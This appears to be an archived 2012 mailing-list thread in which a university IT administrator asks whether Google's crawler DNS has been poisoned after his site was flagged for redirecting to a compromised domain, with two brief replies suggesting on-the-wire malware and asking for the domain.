> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
>
>
>
> --
> Sadiq S
> O< ascii ribbon campaign - stop html mail - www.asciiribbon.org
>
>

Re: DNS poisoning at Google?

[Landon Stewart]

Is it possible that some malicious software is listening and injecting a
redirect on the wire?  We've seen this before with a Windows machine being
infected.

On 26 June 2012 20:53, Matthew Black  wrote:

> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>
>


-- 
Landon Stewart 
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": http://www.superbhosting.net

Re: DNS poisoning at Google?

[Sadiq Saif]

Accidentally sent that to Matthew only,

mind sharing the domain name?

On Tue, Jun 26, 2012 at 11:53 PM, Matthew Black  wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
>
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu
>



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org

DNS poisoning at Google?

[Matthew Black]

Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu